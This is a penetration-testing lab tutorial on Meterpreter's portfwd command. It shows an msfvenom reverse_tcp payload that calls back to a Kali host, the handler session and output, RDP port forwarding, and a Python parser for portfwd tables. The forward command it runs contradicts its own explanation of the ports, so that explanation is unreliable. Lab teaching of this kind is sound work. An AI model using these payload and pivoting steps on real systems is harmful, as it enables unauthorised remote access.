Meterpreter has a built-in command that can take the place of tools such as lcx and nc for most port-forwarding needs.
Command: portfwd
Attacker machine: Kali, 10.10.1.104
Target machine: Windows XP, 10.10.1.103
Port 3389 is open on the target so that the forward can be verified.
portfwd
Getting a meterpreter shell on the target: first generate the payload.
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.104 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Run shell.exe on the target; the session connects back to the handler successfully.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.1.104
lhost => 10.10.1.104
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.1.104:4444
[*] Sending stage (180291 bytes) to 10.10.1.103
[*] Meterpreter session 1 opened (10.10.1.104:4444 -> 10.10.1.103:1043) at 2020-06-24 09:43:54 -0400
meterpreter >
Now use portfwd for the forwarding. portfwd is one of Meterpreter's networking commands and only runs inside a meterpreter shell.
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
-R Indicates a reverse port forward.
-h Help banner.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt> Forward: remote host to connect to.
meterpreter >
Now start the forward.
meterpreter > portfwd add -l 3389 -r 10.10.1.103 -p 23389
[*] Local TCP relay created: :3389 <-> 10.10.1.103:23389
meterpreter > portfwd
Active Port Forwards
====================
Index Local Remote Direction
----- ----- ------ ---------
1 0.0.0.0:3389 10.10.1.103:23389 Forward
1 total active port forwards.
meterpreter >
portfwd add -l 23389 -r 10.10.1.103 -p 3389
This command forwards the remote host's port 3389 to a listener on local port 23389 (-l is the local port to listen on, -r the remote host, -p the remote port to connect to).
Connecting to local port 23389 reaches the target's port 3389, and the login succeeds.
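As an added example (not Metasploit's own code), the following Python module encodes the option meanings from the -h banner above and parses the "Active Port Forwards" table, so a `portfwd add` command can be checked against the entry the session actually created. The layout chosen for reverse-mode (-R) entries and the 127.0.0.1 default for -L in that mode are assumptions; the forward-mode behaviour follows the table shown above.

```python
# Added example, not Metasploit's own code: model the portfwd options from the
# -h banner and parse the "Active Port Forwards" table printed by `portfwd list`.
import re
import shlex
from dataclasses import dataclass
@dataclass(frozen=True)
class Relay:
    local: str      # "host:port" on the Metasploit side (-L/-l)
    remote: str     # "host:port" on the compromised-host side (-r/-p)
    direction: str  # "Forward": local side listens; "Reverse": remote side listens
# One data row of the table: "<index> <local> <remote> <Forward|Reverse>"
_ROW = re.compile(r"^\s*(\d+)\s+(\S+)\s+(\S+)\s+(Forward|Reverse)\s*$")

def parse_portfwd_add(cmdline: str) -> Relay:
    """Resolve a `portfwd add ...` line into the relay it creates."""
    args = shlex.split(cmdline)
    if args[:2] != ["portfwd", "add"]:
        raise ValueError("expected 'portfwd add ...'")
    opts, reverse, i = {}, False, 2
    while i < len(args):
        if args[i] == "-R":
            reverse, i = True, i + 1
        elif args[i] in ("-L", "-l", "-p", "-r") and i + 1 < len(args):
            opts[args[i]], i = args[i + 1], i + 2
        else:
            raise ValueError(f"bad or incomplete option: {args[i]}")
    if reverse:  # -R: compromised host listens on -p, traffic is delivered to -L:-l
        return Relay(f"{opts.get('-L', '127.0.0.1')}:{opts['-l']}",  # default assumed
                     f"0.0.0.0:{opts['-p']}", "Reverse")
    # Forward: Metasploit listens on -L:-l (all interfaces when -L is omitted, as the
    # table above shows) and connects out to -r:-p through the session.
    return Relay(f"{opts.get('-L', '0.0.0.0')}:{opts['-l']}",
                 f"{opts['-r']}:{opts['-p']}", "Forward")

def parse_portfwd_list(text: str) -> dict:
    """Parse `portfwd list` output into {index: Relay}, skipping header and footer."""
    entries = {}
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            idx, local, remote, direction = m.groups()
            entries[int(idx)] = Relay(local, remote, direction)
    return entries
# Constructed sample: the table the session above printed after `portfwd add`
LIST_OUTPUT = """Active Port Forwards
====================
Index Local Remote Direction
----- ----- ------ ---------
1 0.0.0.0:3389 10.10.1.103:23389 Forward
1 total active port forwards."""
```

Comparing parse_portfwd_list(LIST_OUTPUT)[1] with parse_portfwd_add(...) for a given command line shows at a glance which side listens and which side is connected to.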
Other commands
List the port-forward entries:
portfwd list
Delete the port forward with index 1:
portfwd delete -i 1
Remove all port forwards:
portfwd flush